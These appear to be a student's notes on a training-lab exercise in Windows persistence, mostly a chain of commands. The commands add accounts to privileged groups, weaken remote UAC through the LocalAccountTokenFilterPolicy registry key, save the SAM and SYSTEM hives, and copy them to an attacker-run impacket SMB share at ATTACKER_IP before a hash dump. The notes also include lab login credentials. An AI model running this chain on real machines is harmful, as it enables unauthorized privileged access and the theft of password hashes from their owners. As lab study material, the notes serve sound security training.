Task 1 - Introduction

Username :	Administrator
Password :	Password321

Task 2 - Tampering With Unprivileged Accounts

Assign Group Memberships

Assuming we already have the password for unprivileged account

C:\\> net localgroup administrators thmuser0 /add

To look less suspicious, assign to Backup Operators group

C:\\> net localgroup "Backup Operators" thmuser1 /add

Since unprivileged account cannot RDP or WinRM, we need to add it to Remote Desktop Users (RDP) or Remote Management Users (WinRM) groups. Here we will use WinRM as example

C:\\> net localgroup "Remote Management Users" thmuser1 /add

Even if you are on the Backups Operators group, you wouldn't be able to access all files as expected, as we are login via evil-winrm. To regain our privilege, simply set the registry LocalAccountTokenFilterPolicy to value 1:

C:\\> reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

Making a backup of SAM and SYSTEM files and download them to our attacker machine:

reg save hklm\\system system.bak
reg save hklm\\sam sam.bak

Since the PowerShell download does not work so well, we will use impacket-smbserver here

┌──(kali㉿VirtualBox)-[~]
└─$ mkdir share

┌──(kali㉿VirtualBox)-[~]
└─$ impacket-smbserver -smb2support -username Administrator -password Password321 public share

C:\\> copy filename \\\\ATTACKER_IP\\public\\

Then we dump the password hash using impacket-secretsdump